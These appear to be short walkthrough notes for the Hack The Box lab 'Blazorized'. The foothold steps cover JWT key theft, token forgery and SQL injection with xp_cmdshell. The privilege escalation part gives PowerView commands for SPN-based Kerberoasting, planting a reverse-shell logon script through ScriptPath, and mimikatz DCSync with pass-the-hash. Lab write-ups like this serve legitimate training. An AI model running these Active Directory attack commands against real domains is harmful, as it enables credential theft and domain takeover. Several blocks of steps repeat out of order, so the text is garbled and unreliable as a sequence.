Foothold
1. ffuf to find admin.blazorized.htb
2. Download shared.dll to get the JWT signing key
3. Craft your own key and put it in local storage at admin.blazorized.htb
4. SQL injection and xp_cmdshell to get RCE
2. Download shared.dll to get the JWT signing key
3. Craft your own key and put it in local storage at admin.blazorized.htb
4. SQL injection and xp_cmdshell to get RCE
PrivEsc
1. DACL attack 1: Stealing SPN
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "nu_1055"}
2. Get SPN and roast the ticket to get the password for RSA_4810, then evil-winrm
Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='test/tester'}
Get-DomainSPNTicket -SPN test/tester
3. DACL attack 2: Modifiable Script Path
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RSA_4810"}
4. Upload rev.ps to a script folder
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "nu_1055"}
2. Get SPN and roast the ticket to get the password for RSA_4810, then evil-winrm
Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='test/tester'}
Get-DomainSPNTicket -SPN test/tester
3. DACL attack 2: Modifiable Script Path
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RSA_4810"}
4. Upload rev.ps to a script folder
C:\Windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23
5. Set script path for SSA_6010
Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\rev.ps1'
6. Once authenticated as SSA_6010, get meterpreter shell, load mimikatz and dcsync to get Administator hash
7. PTH to get root.txt
Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\rev.ps1'
6. Once authenticated as SSA_6010, get meterpreter shell, load mimikatz and dcsync to get Administator hash
7. PTH to get root.txt